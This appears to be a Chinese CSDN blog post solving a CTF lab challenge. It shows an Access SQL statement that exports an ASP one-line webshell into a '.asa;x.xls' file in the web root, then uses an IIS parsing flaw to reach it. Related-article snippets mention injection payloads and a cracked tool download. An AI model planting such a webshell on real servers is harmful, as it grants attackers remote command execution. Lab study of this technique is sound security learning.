【WEB】通过SQL语句获取WEB权限实战 通过SQL语句获取WEB权限(access+asp)

最新推荐文章于 2023-08-31 10:14:01 发布
最新推荐文章于 2023-08-31 10:14:01 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014549283/article/details/81838545
版权

【原题】

https://www.mozhe.cn/bug/detail/cXBuSzIya1pWbHdjVFFwNXM3c1ZtZz09bW96aGUmozhe

【解法】

用过sql查询语句写入

select '<%eval request("pass")%>' into [sum] in 'c:\inetpub\wwwroot\1.asa;x.xls' 'excel 8.0;' from [sum]

这个语句用于将一句话导出到excel(access不允许导出其他的危险格式),然后利用解析漏洞访问一句话木马。

 

pcy190
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入实战---利用“dbo”获得SQL管理权限和系统权限
12-16
SQL注入实战---利用“dbo”获得SQL管理权限和系统权限SQL注入实战---利用“dbo”获得SQL管理权限和系统权限
3-6SQL注入网站实例第五步:攻破后台获取web管理员权限
山兔的博客
02-15 2403
当我们得到上位点之后,并且对上位点进行了充分的测试,测试的目标是得到了确认的信息,它是可以显示我们想要的数据库信息,所有的表信息,所有的字段信息,甚至,我们可以得到后台管理员的权限,那么本篇,我们就来解决这个问题 利用上位点进行爆库,获得后台管理员的权限 1.获得当前连接的所有数据库名 我们仍然对这个上位点,进行测试,我们要查询所有数据库,我们对information_schema下的schemata表,其它的我们暂时留空,留空这里我们用单引号括起来, https://61.206.45.132/corp/
Sql语句访问WEB
weixin_30652879的博客
03-05 112
代码 CREATE PROC callSendMailPAGE@url VARCHAR(1000)AS BEGIN DECLARE @xmlHttp INT,@error INT EXEC @error = sp_OACreate "Microsoft.XMLHTTP",@xmlHttp OUTPUT EXEC @error = sp_OAMe...
SQL注入与万能密码登录
山兔的博客
10-26 3944
今天的靶机是一个主要面向web应用程序的框架。更具体地说,我们将了解如何对启用了SQL数据库的web应用程序执行SQL注入。我们的目标是具有针对后端数据库的搜索功能的网站,该数据库包含易受此攻击的可搜索项目攻击类型。任何用户都不应该看到此数据库中的所有项目,因此网站将为我们提供不同的搜索结果。SQL 服务通常如何运行的一个很好的例子是用于任何用户的登录过程。每次用户要登录时,Web 应用程序都会将登录页输入(用户名/密码组合)发送到 SQL 服务,并将其与该特定用户的存储数据库条目进行比较。
WEB攻防-PHP应用&MYSQL架构&SQL注入&跨库查询&文件读写&权限操作
最新发布
siu~
08-31 117
WEB攻防-PHP应用&MYSQL架构&SQL注入&跨库查询&文件读写&权限操作
Web安全 SQL注入 || 文件上传 的漏洞.(拿到服务器的最高权限.)
网络安全领域___专研者.
02-07 4974
本文章是DVWA靶场来模拟,所有答案均为个人想法.(有更好的答案可以评论.) 内容有:(1)SQL注入方式(sqlmap工具的利用)通过SQL注入漏洞一步步拿到管理员后台的账号和密码.(2)寻找网站后台的登陆页面.(3)一句话木马的编写.(4)通过一句话木马连接服务器,并拿到服务器的权限.(5)文件上传技巧和绕过一些比较简单的限制.(6)随意下载和上传服务器的文件.(7)远程连接控制服务器.
web安全】——基于SQL注入拿到webshell
Demo不是emo的博客
11-20 4427
今天参加远程面试的时候面试官问了这样一个题:“你知道哪些通过注入漏洞获取服务器权限的方法?请详细讲讲,”这我直接愣住了,平时渗透中sql注入我一般用来获取数据库的数据信息,虽然在我记忆中我曾经学过通过注入漏洞获取服务器权限的方法,但已经忘得差不多了,所以今天写一篇博客来巩固一下这方面的知识,希望对您们也有帮助
如何通过注入SQL语句获取网站管理权限及安全措施(转)
07-07 5172
出自:http://www.2cto.com/Article/201104/88122.html    我们知道网站后台需要验证用户的输入, 如果不这样做, 用户甚至可以输入一些SQL语句操作后台的数据库, 这么好玩的事情一直没有真正体验过. 前几日学校搞了一个"你最喜欢的辅导员"投票活动, 网站估计是给某个学生团队做的, 结果经同学破解了这个网站的管理员帐号和密码, 我遂向他请教了原理, 也了
墨者学院 web sql 注入题
gudugeji的博客
02-15 600
1、注入漏洞实战 burpsuite抓包 添加X-Forwarded-For:* 保存为.txt文件,放到sqlmap文件中 然后python sqlmap.py -r sql.txt --dbs -batch爆破 得到用户名和密码,登录得到flag2、布尔盲注 点开下面的通知,存在注入点 sqlmap.py -u http://219.153.49.228:49885/new_list.ph...
SQL注入操作流程及实例演示+墨者学院靶场SQL手工注入漏洞测试(MySQL数据库)
ran的博客
01-12 1540
在MYsQL5.0以上版本中,Mysql 有一个系统数据库 information_schema,它是一个存储记录有所有数据库名,表名,列名的数据库,相当于利用该表可以进行一次完整的注入,通过查询它获取指定数据库下面的表名、列名、具体数据信息。当输入了一些乱七八糟的内容之后,网页返回“404错误”或者进行了跳转,则说明本网站对输入的内容可能有检测,则说明这个网站大概率没有注入漏洞。返回的了两个数字,分别是“2”、“3”,因此,修改网址上的“2”、“3”为对应系统函数来进行信息收集。可以在参数值前加“-”;
asp下删除Access数词库中的空记录的sql语句
10-30
asp下删除Access数词库中的空记录的sql语句
web在线SQL查询分析器(ASP+Access)
04-30
web在线SQL查询分析器,类似sql server 2000 的sql 查询分析器界面,可以对网站上的access数据库直接执行sql查询语句。 全部功能用一个asp文件实现,使用方便。
asp执行带参数的sql语句实例
01-01
asp执行带参数的sql语句,需要向sql语句添加参数,可以有效屏蔽SQL注入,源代码如下: 代码如下: var conn = Server.CreateObject(“ADODB.Connection”); conn.ConnectionString = “Provider=Microsoft.Jet.OLEDB...
SQL查询语句通配符与ACCESS模糊查询like的解决方法
01-02
SQL Server中的通配符为:% 与任何个数的字符匹配_ 与单个字符匹配正文我今天在写个页面的时候,也很郁闷,表中明明有记录,但在ASP里就是搜索不到,理论的sql语句如下:Select * FROM t_food Where t_food.name ...
BurpSuite 破解版(含注册机,无后门)下载注册详细教程
热门推荐
HAPPY
07-27 13万+
最近用到Burp,于是找了下吾爱破解上的注册机的原版,也就是没有后门的版本。顺带贴一个教程。 仅供学习交流使用!! 1. BurpSuite 1.7 原版+注册机 下载地址:    csdn已经上传了  https://download.csdn.net/download/u014549283/10568556 百度云: 链接:https://pan.baidu.com/s/1ZGQc...
WEBaspcms漏洞利用
HAPPY
08-18 1万+
【社工方法】(不推荐) 1.首先谷歌关键字 Powered by aspcms.com Copyright ?2010-2011 的漏洞,果然功夫不负有心人 2.接着利用注入漏洞 /plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password...
【逆向】修改软件标题(基于PE Explorer)
HAPPY
08-13 1万+
【工具准备】 1.PEID     0.9中文版下载点击这里 2.PE Explore 下载地址点击这里 【实验过程】 1.首先用PEiD打开软件查壳,发现无壳,而且用basic编写的。                      2.然后用PE Explorer将软件打开 3.点击工具栏中的 "资源查看/编辑器" 按钮 (四个三角形构成的菱形图案) 4.单击左侧的 RC资源--...
【CTF】PHP Hash漏洞(关于0e开头的md5值)
HAPPY
07-30 1万+
原题(PHP代码分析溯源) &lt;?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' &amp;&amp; $md51 == $md52) {     echo "nctf{*****************}"; } else {     ec...
Asp + access
05-20
ASPAccess 的结合可以通过以下步骤实现: 1. 创建一个 Access 数据库,并定义需要存储的数据表和字段。 2. 在 ASP 文件中通过连接字符串连接到 Access 数据库。 3. 使用 SQL 语句进行数据的增删改查操作。 4. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值